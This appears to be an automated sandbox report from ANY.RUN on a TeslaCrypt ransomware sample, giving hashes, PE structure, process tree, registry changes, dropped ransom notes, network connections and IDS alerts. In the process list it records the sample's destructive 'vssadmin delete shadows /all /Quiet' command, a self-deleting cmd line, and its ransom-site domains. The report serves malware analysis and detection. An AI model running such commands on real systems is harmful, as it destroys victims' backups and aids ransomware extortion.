analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

51B4EF5DC9D26B7A26E214CEE90598631E2EAA67

Full analysis: https://app.any.run/tasks/2e2bbf97-8177-4fca-85d7-9589ea946eed
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: April 01, 2023, 08:11:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
ransomware
teslacrypt
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5:

6E080AA085293BB9FBDCC9015337D309

SHA1:

51B4EF5DC9D26B7A26E214CEE90598631E2EAA67

SHA256:

9B462800F1BEF019D7EC00098682D3EA7FC60E6721555F616399228E4E3AD122

SSDEEP:

6144:xy+als+0nIycigV5cbEo6dZbBODPIsjQ/UFsYW:xy+aCFnIycigVSbObBODTMUd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Deletes shadow copies

      • ylttcme.exe (PID: 3344)
    • Renames files like ransomware

      • ylttcme.exe (PID: 3344)
  • SUSPICIOUS

    • Application launched itself

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2368)
      • ylttcme.exe (PID: 3108)
    • Reads the Internet Settings

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
      • ylttcme.exe (PID: 3344)
    • Executable content was dropped or overwritten

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
    • Starts itself from another location

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
    • Starts CMD.EXE for commands execution

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
    • Executes as Windows Service

      • VSSVC.exe (PID: 2576)
    • Creates files like ransomware instruction

      • ylttcme.exe (PID: 3344)
    • Checks for external IP

      • ylttcme.exe (PID: 3344)
  • INFO

    • Checks supported languages

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2368)
      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
      • ylttcme.exe (PID: 3108)
      • ylttcme.exe (PID: 3344)
    • Reads the computer name

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
      • ylttcme.exe (PID: 3344)
    • Creates files or folders in the user directory

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
      • ylttcme.exe (PID: 3344)
    • The process checks LSA protection

      • 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe (PID: 2456)
      • ylttcme.exe (PID: 3344)
      • VSSVC.exe (PID: 2576)
      • vssadmin.exe (PID: 2340)
    • Reads the machine GUID from the registry

      • ylttcme.exe (PID: 3344)
    • Checks proxy server information

      • ylttcme.exe (PID: 3344)
    • Creates files in the program directory

      • ylttcme.exe (PID: 3344)
    • Application launched itself

      • iexplore.exe (PID: 1912)
      • iexplore.exe (PID: 2276)
      • iexplore.exe (PID: 3144)
      • iexplore.exe (PID: 1824)
    • Create files in a temporary directory

      • iexplore.exe (PID: 3144)
      • iexplore.exe (PID: 2276)
      • iexplore.exe (PID: 1912)
      • iexplore.exe (PID: 1824)
    • Manual execution by a user

      • notepad.exe (PID: 3856)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: 1
OSVersion: 4
EntryPoint: 0x12c0
UninitializedDataSize: 3072
InitializedDataSize: 262656
CodeSize: 39424
LinkerVersion: 2.24
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
TimeStamp: 0000:00:00 00:00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Jan-1970 00:00:00
Detected languages:
  • English - United States
TLS Callbacks: 2 callback(s) detected.

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 9
Time date stamp: 01-Jan-1970 00:00:00
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_DEBUG_STRIPPED
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00009914
0x00009A00
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.31891
.data
0x0000B000
0x00000030
0x00000200
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0.41149
.rdata
0x0000C000
0x00004488
0x00004600
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.21344
.eh_fram \x1a
0x00011000
0x00001A20
0x00001C00
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.6913
.bss
0x00013000
0x00000A70
0x00000000
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.idata
0x00014000
0x000007F8
0x00000800
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
5.01594
.CRT
0x00015000
0x00000018
0x00000200
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0.114463
.tls
0x00016000
0x00000020
0x00000200
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0.22482
.rsrc
0x00017000
0x0002F6D0
0x0002F800
IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.15044

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.96701
384
UNKNOWN
English - United States
RT_MANIFEST
2
5.29829
21640
UNKNOWN
English - United States
RT_ICON
3
5.38864
9640
UNKNOWN
English - United States
RT_ICON
4
5.42803
4264
UNKNOWN
English - United States
RT_ICON
5
5.62752
2440
UNKNOWN
English - United States
RT_ICON
6
5.62394
1128
UNKNOWN
English - United States
RT_ICON
Z2
2.87415
90
UNKNOWN
English - United States
RT_GROUP_ICON
FGH57767
7.99829
116042
UNKNOWN
English - United States
UNKNOWN

Imports

KERNEL32.dll
SHELL32.DLL
msvcrt.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
67
Monitored processes
19
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start 51b4ef5dc9d26b7a26e214cee90598631e2eaa67.exe no specs 51b4ef5dc9d26b7a26e214cee90598631e2eaa67.exe ylttcme.exe no specs cmd.exe no specs ylttcme.exe vssadmin.exe vssvc.exe no specs iexplore.exe iexplore.exe no specs notepad.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2368"C:\Users\admin\Desktop\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe" C:\Users\admin\Desktop\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
12
Modules
Images
c:\users\admin\desktop\51b4ef5dc9d26b7a26e214cee90598631e2eaa67.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\user32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\usp10.dll
2456C:\Users\admin\Desktop\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeC:\Users\admin\Desktop\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225547
Modules
Images
c:\windows\system32\ntdll.dll
c:\users\admin\desktop\51b4ef5dc9d26b7a26e214cee90598631e2eaa67.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
3108C:\Users\admin\AppData\Roaming\ylttcme.exeC:\Users\admin\AppData\Roaming\ylttcme.exe51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
12
Modules
Images
c:\users\admin\appdata\roaming\ylttcme.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3216"C:\Windows\system32\cmd.exe" /c del C:\Users\admin\Desktop\51B4EF~1.EXE >> NULC:\Windows\System32\cmd.exe51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3344C:\Users\admin\AppData\Roaming\ylttcme.exeC:\Users\admin\AppData\Roaming\ylttcme.exe
ylttcme.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\roaming\ylttcme.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msimg32.dll
2340"C:\Windows\System32\vssadmin.exe" delete shadows /all /QuietC:\Windows\System32\vssadmin.exe
ylttcme.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\vssadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2576C:\Windows\system32\vssvc.exeC:\Windows\System32\VSSVC.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\vssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3144"C:\Program Files\Internet Explorer\iexplore.exe" http://3kxwjihmkgibht2s.wh47f2as19.com/?enc=1BTKxyuuCEP9wsB6qbLv5Ck2UdA5PBMStwC:\Program Files\Internet Explorer\iexplore.exe
ylttcme.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
3504"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3144 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
3856"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\HELP_RESTORE_FILES.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\notepad.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
40 656
Read events
39 596
Write events
1 052
Delete events
8

Modification events

(PID) Process:(2456) 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2456) 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2456) 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2456) 51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3344) ylttcme.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3344) ylttcme.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
460000003D010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(3344) ylttcme.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3344) ylttcme.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3344) ylttcme.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3344) ylttcme.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
2
Suspicious files
272
Text files
910
Unknown types
64

Dropped files

PID
Process
Filename
Type
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0015-0410-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0015-0416-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\Users\admin\Documents\RECOVERY_KEY.TXTtext
MD5:3397C05861907F3671DF2DF88326F730
SHA256:C11721A727ECD17D385C8FE14E19791C102EDC28A64F87B5A4FF7930EDD3DEC1
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0015-0412-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0015-0407-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0015-040C-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0016-0407-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\MSOCache\All Users\{90140000-0015-0419-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txttext
MD5:C7A0097562A5B8A99821F3EA60CB446A
SHA256:F798DCEDA97937E1F0147E62E5712FCF21D74589DAC77FA67794802B7F18A0B2
3344ylttcme.exeC:\Users\admin\AppData\Roaming\key.datbinary
MD5:887B20556D16D6A0FE850EE9DA6EB464
SHA256:5880ACAE8D786603420096348AA7F685F8870E1E3E3AED7A232D6F9254C5A655
245651B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exeC:\Users\admin\AppData\Roaming\ylttcme.exeexecutable
MD5:6E080AA085293BB9FBDCC9015337D309
SHA256:9B462800F1BEF019D7EC00098682D3EA7FC60E6721555F616399228E4E3AD122
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
12
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3344
ylttcme.exe
GET
200
34.117.59.81:80
http://ipinfo.io/ip
US
text
15 b
shared
3144
iexplore.exe
GET
200
178.79.212.129:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?dbe9b7816b1ee76b
IT
compressed
4.70 Kb
whitelisted
1912
iexplore.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2BnRyLFPYjID1ie%2Bx%2BdSjo%3D
US
der
1.47 Kb
whitelisted
3144
iexplore.exe
GET
200
178.79.212.129:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?15db6d97cac779c9
IT
compressed
4.70 Kb
whitelisted
3144
iexplore.exe
GET
200
178.79.212.129:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?963ab6b51ce0cdc1
IT
compressed
4.70 Kb
whitelisted
3144
iexplore.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
der
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3144
iexplore.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1912
iexplore.exe
204.79.197.200:443
www.bing.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3344
ylttcme.exe
34.117.59.81:80
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted
1912
iexplore.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
3144
iexplore.exe
178.79.212.129:80
ctldl.windowsupdate.com
LLNW
SE
unknown
3144
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
EDGECAST
US
whitelisted
1912
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
ipinfo.io
  • 34.117.59.81
shared
epmhyca5ol6plmx3.wh47f2as19.com
unknown
7tno4hib47vlep5o.7hwr34n18.com
unknown
epmhyca5ol6plmx3.tor2web.blutmagie.de
unknown
epmhyca5ol6plmx3.tor2web.fi
unknown
3kxwjihmkgibht2s.wh47f2as19.com
unknown
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
ctldl.windowsupdate.com
  • 178.79.212.129
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted

Threats

PID
Process
Class
Message
3344
ylttcme.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ipinfo.io
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (wh47f2as19.com)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (epmhyca5ol6plmx3)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (7hwr34n18.com)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (7tno4hib47vlep5o)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (epmhyca5ol6plmx3)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (epmhyca5ol6plmx3)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (epmhyca5ol6plmx3)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (epmhyca5ol6plmx3)
A Network Trojan was detected
ET MALWARE Win32/Teslacrypt Ransomware .onion domain (epmhyca5ol6plmx3)
1 ETPRO signatures available at the full report
No debug info